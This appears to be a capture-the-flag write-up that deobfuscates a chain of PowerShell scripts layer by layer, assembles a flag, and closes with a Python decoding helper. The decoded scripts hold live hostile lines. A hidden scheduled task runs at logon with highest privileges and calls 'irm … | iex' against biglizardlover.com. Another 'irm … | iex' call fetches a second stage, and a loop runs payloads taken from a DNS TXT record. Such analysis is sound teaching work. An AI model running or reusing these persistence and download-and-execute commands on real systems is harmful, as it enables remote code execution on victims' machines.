Register-ScheduledTask -TaskName ("{2}{3}{1}{0}" -f ("{1}{0}"-f'p','acku'),'lyB','We','ek') -Description ("{9}{16}{11}{4}{10}{12}{8}{14}{13}{5}{0}{15}{3}{1}{7}{6}{2}" -f 'hion','n','l',' u',' = o','s','uerebe','iq','ttest ','fl','b','e','jec','sumerfa','+ con',' +','agvalu') -Action (New-ScheduledTaskAction -Execute ("{1}{0}{2}" -f'hel','powers','l.exe') -Argument ((("{10}{6}{3}{5}{15}{14}{1}{13}{17}{2}{9}{8}{12}{7}{11}{4}{0}{16}" -f'0} ','ndo','mand ','tionPo',' {','li','u','glizardlo',' b','{1}irm','-Exec','ver.com/gecko','i','wStyle','pass -Wi','cy By','iex{1}',' Hidden -Com')) -F[CHar]124,[CHar]34)) -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Principal (New-ScheduledTaskPrincipal -UserId "$env:USERDOMAIN\$env:USERNAME" -LogonType ("{1}{2}{0}" -f ("{1}{0}"-f 'active','r'),'Int','e') -RunLevel ("{1}{0}" -f'st',("{1}{0}"-f 'ighe','H'))) | Out-Null
irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i')) | iex
${COns`UMeRf`A`S`HIOn} = ("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')

After cleaning up the formatting and encoded strings in this script, the string flagvalue = objecttest + consumerfashion + uniquerebel is revealed in the description of the scheduled task that is created. One of the three pieces of the flag, ConsumerFashion, is also found in this script as a double base64 encoded string.

Set-ItemProperty "HKCU:\Control Panel\International" -Name "s1159" -Value "Lizard."
Set-ItemProperty "HKCU:\Control Panel\International" -Name "s2359" -Value "Lizard."
Add-Type 'using System;using System.Runtime.InteropServices;public class R{[DllImport("user32.dll",SetLastError=true)]public static extern IntPtr SendMessageTimeout(IntPtr hWnd,int Msg,IntPtr wParam,string lParam,int fuFlags,int uTimeout,out IntPtr lpdwResult);}' ; [R]::SendMessageTimeout(65535,26,0,"Intl",2,5000,[ref]0) | Out-Null
Register-ScheduledTask -TaskName "WeeklyBackup" -Description "flagvalue = objecttest + consumerfashion + uniquerebel" `
    -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument '-ExecutionPolicy Bypass -WindowStyle Hidden -Command "irm biglizardlover.com/gecko | iex"') `
    -Trigger (New-ScheduledTaskTrigger -AtLogOn) `
    -Principal (New-ScheduledTaskPrincipal -UserId "$env:USERDOMAIN\$env:USERNAME" -LogonType "Interactive" -RunLevel "Highest") | Out-Null
irm "biglizardlover.com/gila" | iex
$ConsumerFashion = "WXpBME16UmtOVGt3TWpnPQ=="

The previous script fetches and executes the following script from biglizardlover.com/gila. The final part of this script evaluates to iex. The initial part of this script assigns a long string to the TFr1S variable; this string is then reversed and piped to iex.

$TFr1S = " )'X'+]43[EmOHSP$+]12[EMoHSp$ (&| )93]rAhc[]Gnirts[,)28]rAhc[+78]rAhc[+401]rAhc[((eCaLpER.)'|',)58]rAhc[+401]rAhc[+37]rAhc[((eCaLpER.)'$',)75]rAhc[+97]rAhc[+27]rAhc[((eCaLpER.)43]rAhc[]Gnirts[,'Ywo'(eCaLpER.)')RWhRWhnIOj-RWhXRWh+]3,1[)ecnerefERPEsOBrev9OH]gniRTS'+'[( (&Uh'+'I '+'Ywo ) RWh RWh RWhsFo:ElBairavRWh METI-tEs(9OH Ywo+ )}'+')RWhd2x0RWhRoXb- _9OH (]raH'+'c[{hcaEROf UhIRWhgRWhTILps- RWhURWh TIlPS-RWhcRWh ti'+'Lp'+'S-RWh-RW'+'hTilps-RWh'+'JRWhTILPS- RWhB'+'RWhTILPS-RWhwRWhtIlpS-RWh%RWhTIlpS-RW'+'h<RWhTILPS- RWhoRWh TIlPS-RWh9'+'3-51B02<49-601B721U521g96'+'j46O321C711W56B321%99j911B39B221O121C09g92j07-67j89C99'+'g78%87'+'U78%66<701C67O52O82W46O221C51-31%61j31g'+'98<49-27<121B98%87B27U17j97g66U9W93%08g93%76-27<37W37-86W101j31j27O56%48-98g621j09%66C37%76g86g221C0C'+'31O09U66W97-56<27<27g37<86B56O47W9O31j1O01%37%76B67g46C46-66j011C0-01O3'+'1B98-4'+'9C'+'86g79W98j'+'76j27-46B88W47%59j801g0-31j56C56-27%96W49-59<27O09%66W39<31j49%49O27C87'+'j66g59<521<0j98O59<67j98W621<31-31-31B31C93B56O56B88j99%0W98%88'+'C'+'89C31C18'+'<31-4-13-6U82W1'+'B37j76g27C39<27W3'+'7B98j96j47W86%56-86U09U98g9U1<92C1B92O13W5O66g57'+'%76%001j4'+'9U59O27O98g27C46'+'B67%59-67g521j46j27W98B'+'49W48-621g32g32C211W'+'22'+'1-811<31W22-51W08-31B22%4<86U7'+'6C001B76j86j221'+'W88g57%31j98B76j86O1g46W67-59B67W521B19j39<56g31W47U76-86B59U98B49g1O46<67W59O67C521C88%31-98j76B86C1B76j66j86B98O87-8'+'01C8'+'8O31j98B76C86B5%66W57-76<001W49U5'+'9O27g98B27W46C67-59W67-521C46-27U98%49-48g621%31C56O66C66'+'j97B31U76W59B27U98j58W27O'+'31-87W86g98O67C98W49O31O87j86-56j97-88g39C31B211C4W51-77j56C56U37%3g'+'13<03-5'+'9j27<49-8'+'8O51U77g5-98-59W66%39g46'+'g001C56U56<501g811g31O68O31j221%31g49-49O67W56B87W31W87j86-56U97W88%39C31O22-49<27j87B86j19<5'+'9C27B621<39O66g59C27j98B76W001U3W27W46U86B98O76<88%721j3W46<27%98g49<48U621-31O47W76W86W49<88U'+'31B22U46B27<98O49U'+'48-621U31C47C76g86O'+'49O88O51O31U76j6'+'6<86O98g86B76U86<57C27<501O27B39g48<12'+'1-0j31%27O39j48%121g0U3'+'7<3'+'7%801B31C31B31g31<93g56j56%88
'+'B99g0%98C88j89g31U18-31<27j88<76O86j98C76j66j011<48g5'+'6-9'+'8-76<27O56B86%621<31U76%66U86<9'+'8g87g801O59U66j59<59g401U0g31B37<76C27'+'U39<27C37-'+'98<96%47%86j56W86'+'C09U98<9-31'+'B27g56'+'O86j701g98-88W89<0j'+'31g48C98W59-67O39C98<49U67W27j57W48j58B67B56C67U47%9U31g98%49C27W88-29U27C721O97-27U221<0-27U07-66C19W76U001<31-31U31%31W93<51C47C39B17g3O27O78U86%76<47U66O87j27U59O98O86<88-87W49O86%97W9-37C59-67B'+'78-86B56W2j47g46%86<2<46U66%87%3C59O27<19B66-56g37W59W67B78O'+'86B56j47j86g97<'+'2j2%32j49-39U98j98<96<51-31%61C31-'+'48j98<59B67<39j'+'98%49g67<27<57<4'+'8j58-67U56g67j47O9W31-31-31O31g93C42g13<31j46W88C46%86U58-67O69g'+'0C31B82j31O46B88'+'U46U86C76O86B69W0'+'B31g46j66%37%7'+'6C67U721j0-98W27W601W31j61O31g27B78%86j76O47g66W87W27%'+'59g98g86U88<87U49'+'U86B'+'97g9C31-31-31%31W93j51-47C39W17-3W37U59C67B78g86'+'B56<51g31j521j69j401%121U32<19C76<27'+'W9C3'+'1-96j98B67O5'+'21U0<76-86U66j301-31g'+'61%31g37O76U27C39C27%37j98W96<47g86<56B86g09O98-9'+'B31O31<31%31-93%4B4U4B4W49<47C76'+'C86g59g98-621O31U48<98<59C2'+'7B39<66j59j521j37g76<67W39O58U'+'40'+'1<0%31O98j87j27<17-97U89g0U98j87j27C56U27O621B31<18j31-98%58g98'+'-31%27g39O48%121W0C31<46-66j87O3j59W27C19j66W56W37U59-67j78C86<56C47C86-97j3U02W69j711-97U86g911O76U621%321-56C56%97g221O37g701U321g31U27W46W67B99-49j76%501W0-27C19C56j66W4'+'9C27B721j5O5g47C76-86g59C98U621O52-72<27W49W67<111%46U66'+'j59W'+'7'+'01<32%32O211W98U59B27j1'+'9g76g66B011B3'+'-46j27g98B49%48C621B811C5g47W76j86B59U98<621W98W27O601U3j12C701%'+'121-021U32%32j211<47W76O86B37g66C87W76O401B3U98C58j27C121%3%46B27C98U'+'49<48O621W811W5<31B58g27W86j31<61j31C'+'09W66j97O56j27B27'+'W37C86<56O47B9B31B31-31U31C93g68j31%4C27%88j59<98%9C5U31O27<56-86U96O09RWh (]gNirTS[+ Ywo ) RWhRWh  RWhS'+'foRWh  ELBAIrav-TeS(9OHYwo'( ";  -JOIN (  vArIABlE  tfR1s  ).VaLUe[-1..- ((  vArIABlE  tfR1s  ).VaLUe.leNgTH)]|& ( ([sTriNg]$VERboSEPrEfeREnce)[1,3]+'X'-joiN'')

Reversing the string from the TFr1S variable reveals the following script. Once again, the final part of this script evaluates to iex. The initial part of this script concatenates a number of strings, and makes a series of replacements.

('owYHO9(SeT-varIABLE  hWRof'+'ShWR  hWRhWR ) owY +[STriNg]( hWR90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W'+'72B72j65O79j66W90'+'C13j16<13j68W72g85B13<5W118W126O84<94'+'U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121'+'%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-'+'3B110B66g67g9'+'1j72B95U89W112O23%23<10'+'7'+'W95j'+'66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C9'+'4W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-'+'89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<1'+'04'+'U85O93W76<67g73j125j95j66<93B7'+'2C95<89<84U13O126-89g95g68C'+'67C74<94W4B4U4B4%39-13%13<13O13B'+'9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16'+'g13-103j66U68-67<0U12'+'5O76B89j69-1'+'3C9W'+'72<67C91<23U121%104j96j125j13g15<65B'+'68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79'+'B68U'+'94U78<88U68g89g95'+'%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C6'+'7%73%66j64g13B'+'0W96B68O67C68U64U'+'88B64O13j28B13C0'+'g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j8'+'4<75<72<76g94%89'+'j93<76B95<89j84'+'-13C16%13-15<69<89j89U93-94j23%2j2'+'<79g68j74j65B68'+'O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87'+'B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13'+'j0<98W88-89g107j68O'+'65g72B'+'13-9<89U90C'+'68W65j68%74%69<89'+'-73C72<93U'+'72C67<73B13g0U104g95<95j66U95O108g78g8'+'9<68U66%67U13<126%68B65O72<67-8'+'9-6'+'5g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B'+'88%65j65g39<13g13B13C13B108%7'+'3<7'+'3U0g121%84j93O72%13j0-1'+'21<84g93B72O105<72C75<68U67B68g89O68<6'+'6j67U13O15O88O94'+'O68g67C74C13U126-84'+'U94O89<72B64U22B13'+'U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j7
2C95g66O93<126B72C9'+'5<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g'+'64g93%66W95-89-5g77U15O8'+'8-94<72j9'+'5-30<31'+'g3%73U65C65j77-15W4C112B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13'+'O72W85j89U72B95W67U13B79j'+'66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O9'+'5U94W100<67-75W66%5B68C67B89j13O8'+'8C10'+'8-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W'+'122j68j67B100C6'+'7U68<4%22B13-80W15-22W13<118-1'+'22'+'W112C23g23g126-84W94'+'B89W72j64j125g76-95%76B'+'64C72g89O72O95U9'+'4j100%67%'+'75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B7'+'3W72<93C72g67j73B'+'1W28U6-31-4-13<'+'81C13C98'+'C'+'88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j'+'78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67'+'j89W97g68'+'C9'+'4-89B1'+'3O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13'+'C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89'+'g13j16%13-15C122O64W28O25O76C107<66%87U'+'78%87g'+'99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j'+'69g125U127B106-94<20B15-3'+'9hWR-SPlIT hWRohWR -SPLIThWR<h'+'WR-SplIThWR%hWR-SplIthWRwhWR-SPLIThWR'+'BhWR -SPLIThWRJ'+'hWR-spliTh'+'WR-hWR-S'+'pL'+'it hWRchWR-SPlIT hWRUhWR -spLIThWRghWRIhU fOREach{[c'+'Har]( HO9_ -bXoRhWR0x2dhWR)'+'}) +owY HO9(sEt-ITEM hWRvariaBlE:oFshWR hWR hWR ) owY'+' I'+'hU&( (['+'STRing]HO9verBOsEPREference)[1,3]+hWRXhWR-jOInhWRhWR)').REpLaCe('owY',[strinG][chAr]34).REpLaCe(([chAr]72+[chAr]79+[chAr]57),'$').REpLaCe(([chAr]73+[chAr]104+[chAr]85),'|').REpLaCe(([chAr]104+[chAr]87+[chAr]82),[strinG][chAr]39) |&( $pSHoME[21]+$PSHOmE[34]+'X')

After the concatenation and replacements, the initial part of the previous script evaluates to the following. Again, the final part of this script evaluates to iex. Like the first script, the initial part of this script splits a long string on specific characters and XORs each resulting number with the key 0x2d. The resulting script is piped to iex.

"$(SeT-varIABLE  'ofS'  '' ) " +[STriNg]( '90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W72B72j65O79j66W90C13j16<13j68W72g85B13<5W118W126O84<94U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-3B110B66g67g91j72B95U89W112O23%23<107W95j66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C94W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<104U85O93W76<67g73j125j95j66<93B72C95<89<84U13O126-89g95g68C67C74<94W4B4U4B4%39-13%13<13O13B9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16g13-103j66U68-67<0U125O76B89j69-13C9W72<67C91<23U121%104j96j125j13g15<65B68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79B68U94U78<88U68g89g95%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C67%73%66j64g13B0W96B68O67C68U64U88B64O13j28B13C0g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j84<75<72<76g94%89j93<76B95<89j84-13C16%13-15<69<89j89U93-94j23%2j2<79g68j74j65B68O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13j0<98W88-89g107j68O65g72B13-9<89U90C68W65j68%74%69<89-73C72<93U72C67<73B13g0U104g95<95j66U95O108g78g89<68U66%67U13<126%68B65O72<67-89-65g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B88%65j65g39<13g13B13C13B108%73<73U0g121%84j93O72%13j0-121<84g93B72O105<72C75<68U67B68g89O68<66j67U13O15O88O94O68g67C74C13U126-84U94O89<72B64U22B13U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j72C95g66O93<126B72C95<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g64g93%66W95-89-5g77U15O88-94<72j95-30<31g3%73U65C65j77-15W4C11
2B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13O72W85j89U72B95W67U13B79j66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O95U94W100<67-75W66%5B68C67B89j13O88C108-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W122j68j67B100C67U68<4%22B13-80W15-22W13<118-122W112C23g23g126-84W94B89W72j64j125g76-95%76B64C72g89O72O95U94j100%67%75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B73W72<93C72g67j73B1W28U6-31-4-13<81C13C98C88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67j89W97g68C94-89B13O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89g13j16%13-15C122O64W28O25O76C107<66%87U78%87g99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j69g125U127B106-94<20B15-39'-SPlIT 'o' -SPLIT'<'-SplIT'%'-SplIt'w'-SPLIT'B' -SPLIT'J'-spliT'-'-SpLit 'c'-SPlIT 'U' -spLIT'g'| fOREach{[cHar]( $_ -bXoR'0x2d')}) +" $(sEt-ITEM 'variaBlE:oFs' ' ' ) " |&( ([STRing]$verBOsEPREference)[1,3]+'X'-jOIn'')

The following is the result of evaluating the initial part of the previous script. This script base64 decodes the DNS TXT record for VFdWbllVSnZibXM9.biglizardlover.com, which is passed as an argument to iex. This script also contains the objectTest variable, another double base64 encoded piece of the flag.

while ($true) {
    $glideelbow = iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Resolve-DnsName VFdWbllVSnZibXM9.biglizardlover.com -Type txt | Select-Object -ExpandProperty Strings))))
    $twilightdepend = Join-Path $env:TEMP "lizard.jpg"
    $biscuitrecognize = Get-Random -Minimum 1 -Maximum 25
    $galaxyfeastparty = "https://biglizardlover.com/img/lizard$biscuitrecognize.jpg"
    Invoke-WebRequest $galaxyfeastparty -OutFile $twilightdepend -ErrorAction SilentlyContinue | Out-Null
    Add-Type -TypeDefinition "using System; using System.Runtime.InteropServices; public class W { [DllImport(`"user32.dll`")] public static extern bool SystemParametersInfo(int uAction,int uParam,string lpvParam,int fuWinIni); }"; [W]::SystemParametersInfo(20,0,$twilightdepend,1+2) | Out-Null
    Start-Process powershell -ArgumentList '-Command', $glideelbow -WindowStyle Hidden
}
$objectTest = "Wm14aFozczNOak0wTWpZNVlXVmhPRGs9"

The DNS TXT record for VFdWbllVSnZibXM9.biglizardlover.com contains the following script. Like one of the earlier scripts, this script base64 decodes, then uncompresses another script that is passed to iex.

& ( $VerbosepreFerenCe.tOsTrinG()[1,3]+'X'-jOIn'') (neW-objECt io.StREAmrEaDer((neW-objECt SysteM.IO.cOMPReSSiOn.deflaTestReam( [SystEm.iO.mEmorYStrEaM] [COnVERT]::FRoMBase64sTriNG('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'),[SYSTEm.IO.cOmpREsSIon.CoMpReSSionmoDE]::dEComPreSS)) , [tExT.encOding]::ascIi) ).rEADToeND( )

The following is the decoded and uncompressed script. This script reverses the string assigned to the cMJzG0 variable and passes it to iex.

$cMJzG0= "))93]rahC[,421]rahC[,63]rahC[F-)')}'+'2'+'{X}2{+]31[DiLlEhS}'+'0'+'{+]1[DiLLehS}0'+'{ '+'( & }1{)(Dn'+'e'+'oTDaeR.))iICsa::]gnIDO'+'cne'+'.T'+'XE'+'T.'+'meTS'+'Ys[ '+',))sSE'+'RPmoCED::]Edo'+'MNoiSs'+'ERP'+'MOC'+'.noisserp'+'M'+'Oc.OI'+'[,) }2{A43z'+'8KG1R90j76'+'WrqRe0zaKr1L'+'m7LKR5X1s'+'aiooB'+'DH'+'D7+J0i5tJ77Lo'+'6ANRbL+OWh'+'TP+H'+'i34F'+'Mg4'+'d'+'0Un'+'dNziXX78'+'6fT'+'D'+'iXrh44V'+'98'+'/b2/Cx'+'T1'+'iNhkmH'+'dEZ0Ln'+'Oc2c'+'a'+'P'+'1KMpKx68RJMAHU'+'4AFwwVE'+'imSSE6hS59'+'pc'+'d'+'lT3ESTEl2aHvZV'+'0JapPtRwySxNSQ'+'ZcEC'+'ae'+'A97cD'+'9UK'+'Y'+'IgN'+'aLh'+'bke7GmqIIa'+'KKT4'+'1VcN7z8t'+'mMNv'+'2cF'+'VLWia/S/1kBZJG7xQt6KK'+'5'+'ERPU9WkrNQBEo78GoZQz+ZT'+'m3'+'/7zAjM0H6BqK29+'+'ZJNV290k1NbZTu1'+'eYZK+'+'XTt'+'UUKbaJ'+'gWPt'+'0kB'+'waCGky'+'+vXM'+'EAJ8aP9Yf}2{('+'gni'+'RTs4'+'6ESa'+'BmoRF::]TrevNOC[ ]MAE'+'RTSyR'+'OMEm.Oi.Me'+'Ts'+'ys'+'[ (mAERtS'+'eTAlfED.'+'N'+'oissER'+'pM'+'oc.oI.M'+'ETsys TcEjbo'+'-W'+'en'+' ((Re'+'dAERmAe'+'RTS.Oi.MEtsYS Tc'+'Ejbo'+'-Wen ( '(( ( )''nioJ-'X'+]3,1[)EcnereferpeSOBReV$]gNirts[( (. " ; & ( $shellId[1]+$ShellID[13]+'x')([STriNg]::joIN('' , (  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE[ - 1.. -((  GEt-vARiaBLE  ('Cm'+'j'+'Zg0')).vaLUE.LenGtH)] ))

Reversing the string yields the following script. The first part of this script evaluates to iex. The second part of the script uses a format string to build the complete script, which is then passed to iex.

.( ([striNg]$VeRBOSepreferencE)[1,3]+'X'-Join'') ( ((' ( neW-'+'objE'+'cT SYstEM.iO.STR'+'eAmREAd'+'eR(( '+'ne'+'W-'+'objEcT sysTE'+'M.Io.co'+'Mp'+'REssio'+'N'+'.DEflATe'+'StREAm( ['+'sy'+'sT'+'eM.iO.mEMO'+'RySTR'+'EAM] [CONverT]::FRomB'+'aSE6'+'4sTR'+'ing'+'({2}fY9Pa8JAE'+'MXv+'+'ykGCaw'+'Bk0'+'tPWg'+'JabKUU'+'tTX'+'+KZYe'+'1uTZbN1k092VNJZ'+'+92KqB6H0MjAz7/'+'3m'+'TZ+zQZoG87oEBQNrkW9UPRE'+'5'+'KK6tQx7GJZBk1/S/aiWLV'+'Fc2'+'vNMm'+'t8z7NcV1'+'4TKK'+'aIIqmG7ekb'+'hLa'+'NgI'+'Y'+'KU9'+'Dc79A'+'ea'+'CEcZ'+'QSNxSywRtPpaJ0'+'VZvHa2lETSE3Tl'+'d'+'cp'+'95Sh6ESSmi'+'EVwwFA4'+'UHAMJR86xKpMK1'+'P'+'a'+'c2cO'+'nL0ZEd'+'HmkhNi'+'1T'+'xC/2b/'+'89'+'V44hrXi'+'D'+'Tf6'+'87XXizNd'+'nU0'+'d'+'4gM'+'F43i'+'H+PT'+'hWO+LbRNA6'+'oL77Jt5i0J+7D'+'HD'+'Booia'+'s1X5RKL7m'+'L1rKaz0eRqrW'+'67j09R1GK8'+'z34A{2} ),['+'IO.cO'+'M'+'pression.'+'COM'+'PRE'+'sSioNM'+'odE]::DEComPR'+'ESs)),'+' [sY'+'STem'+'.T'+'EX'+'T.'+'enc'+'ODIng]::asCIi)).ReaDTo'+'e'+'nD(){1} & ('+' {'+'0}SheLLiD[1]+{'+'0'+'}ShElLiD[13]+{2}X{'+'2'+'})')-F[Char]36,[Char]124,[Char]39))

The following is the complete, formatted script. This script base64 decodes, then uncompresses another script which is piped to iex.

( neW-objEcT SYstEM.iO.STReAmREAdeR(( neW-objEcT sysTEM.Io.coMpREssioN.DEflATeStREAm( [sysTeM.iO.mEMORySTREAM] [CONverT]::FRomBaSE64sTRing('fY9Pa8JAEMXv+ykGCawBk0tPWgJabKUUtTX+KZYe1uTZbN1k092VNJZ+92KqB6H0MjAz7/3mTZ+zQZoG87oEBQNrkW9UPRE5KK6tQx7GJZBk1/S/aiWLVFc2vNMmt8z7NcV14TKKaIIqmG7ekbhLaNgIYKU9Dc79AeaCEcZQSNxSywRtPpaJ0VZvHa2lETSE3Tldcp95Sh6ESSmiEVwwFA4UHAMJR86xKpMK1Pac2cOnL0ZEdHmkhNi1TxC/2b/89V44hrXiDTf687XXizNdnU0d4gMF43iH+PThWO+LbRNA6oL77Jt5i0J+7DHDBooias1X5RKL7mL1rKaz0eRqrW67j09R1GK8z34A' ),[IO.cOMpression.COMPREsSioNModE]::DEComPRESs)), [sYSTem.TEXT.encODIng]::asCIi)).ReaDToenD()| & ( $SheLLiD[1]+$ShElLiD[13]+'X')

The following is the decoded and uncompressed script, which contains the last piece of the flag, UniqueRebel.

@'
Add-Type -AssemblyName System.Speech; Add-Type -AssemblyName System.Windows.Forms
$SpeechSynth = New-Object System.Speech.Synthesis.SpeechSynthesizer
$SpeechSynth.SelectVoice('Microsoft Zira Desktop')
$lizard = Get-Date -Format tt
while ($true) {
    $SpeechSynth.Speak($lizard)
    [System.Windows.Forms.MessageBox]::Show($lizard, 'Alert', 'OK', 'Information')
}
$UniqueRebel = "TWpVeU9UWXlORGN3ZlE9PQ=="
'@

Double base64 decoding all three pieces of the flag and assembling them reveals the complete flag.

flagvalue = objecttest + consumerfashion + uniquerebel
flagvalue = flag{7634269aea89 + c0434d59028 + 252962470}
flag{7634269aea89c0434d59028252962470}
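Every layer in the chain above (split-and-XOR, string reversal, -f format strings, base64 plus raw DEFLATE, and the double base64 flag fragments) can be undone statically without handing anything to iex. The Python below is an added example written for this writeup, not code from the challenge: the XOR excerpts and flag fragments are copied from the scripts above, the DEFLATE sample is constructed, and the XOR decoder generalises to any separator set and key rather than only the two used here.

```python
"""Static helpers for the obfuscation layers walked through above (added
example, not part of the original writeup or the challenge scripts). Each
function undoes one layer on its own, so nothing is ever handed to iex."""
import base64
import re
import zlib


def split_xor_decode(blob: str, separators: str, key: int) -> str:
    """Undo `-split 'a' -split 'b' ... | % { [char]($_ -bxor key) }`.

    PowerShell -split is case-insensitive by default, so -split 'o' also
    cuts on 'O' and -split 'J' on 'j'; re.IGNORECASE reproduces that.
    """
    char_class = "[" + "".join(re.escape(c) for c in separators) + "]"
    tokens = re.split(char_class, blob, flags=re.IGNORECASE)
    # Every decimal token is XORed with the one-byte key and cast to a char.
    return "".join(chr(int(tok) ^ key) for tok in tokens if tok)


def reverse_layer(text: str) -> str:
    """Undo `$s[-1..-($s.Length)] -join ''`, which is a plain reversal."""
    return text[::-1]


def format_layer(fmt: str, *args: str) -> str:
    """Undo `"{1}{0}" -f 'a','b'`; positional {n} slots map onto str.format."""
    return fmt.format(*args)


def inflate_b64(payload: str) -> str:
    """Undo [Convert]::FromBase64String followed by DeflateStream(Decompress).

    .NET DeflateStream produces raw DEFLATE with no zlib header, so the
    decoder must be opened with wbits=-15.
    """
    return zlib.decompress(base64.b64decode(payload), -15).decode("ascii")


def double_b64_decode(piece: str) -> str:
    """Undo the two nested base64 encodings applied to each flag fragment."""
    return base64.b64decode(base64.b64decode(piece)).decode("ascii")


# Double-base64 fragments exactly as they appear in the three decoded scripts.
FLAG_PIECES = {
    "objecttest": "Wm14aFozczNOak0wTWpZNVlXVmhPRGs9",
    "consumerfashion": "WXpBME16UmtOVGt3TWpnPQ==",
    "uniquerebel": "TWpVeU9UWXlORGN3ZlE9PQ==",
}


def assemble_flag(pieces: dict = FLAG_PIECES) -> str:
    """Join the fragments in the order the scheduled-task description gives:
    flagvalue = objecttest + consumerfashion + uniquerebel."""
    order = ("objecttest", "consumerfashion", "uniquerebel")
    return "".join(double_b64_decode(pieces[name]) for name in order)


# Short excerpts of the two XOR layers, copied from the scripts above.
LAYER1_EXCERPT = "120,67&73I98}72,4G5}81I12,5}12"          # tail of the 0x2c blob
LAYER1_SEPARATORS = "gR&,Yz}iFb"
LAYER2_EXCERPT = "90O69U68-65<72O13U5C9%89<95j88%72C4%13"   # start of the 0x2d blob
LAYER2_SEPARATORS = "o<%wBJ-cUg"
# Constructed raw-DEFLATE stored block holding "iex" (not from the challenge).
DEFLATE_SAMPLE = "AQMA/P9pZXg="

if __name__ == "__main__":
    print(split_xor_decode(LAYER1_EXCERPT, LAYER1_SEPARATORS, 0x2C))
    print(split_xor_decode(LAYER2_EXCERPT, LAYER2_SEPARATORS, 0x2D))
    print(reverse_layer("xei"))
    print(format_layer("{2}{3}{1}{0}", format_layer("{1}{0}", "p", "acku"), "lyB", "We", "ek"))
    print(inflate_b64(DEFLATE_SAMPLE))
    print(assemble_flag())
```

Feeding the full blobs from the scripts above into split_xor_decode with the matching separator set and key reproduces the decoded scripts shown in this writeup.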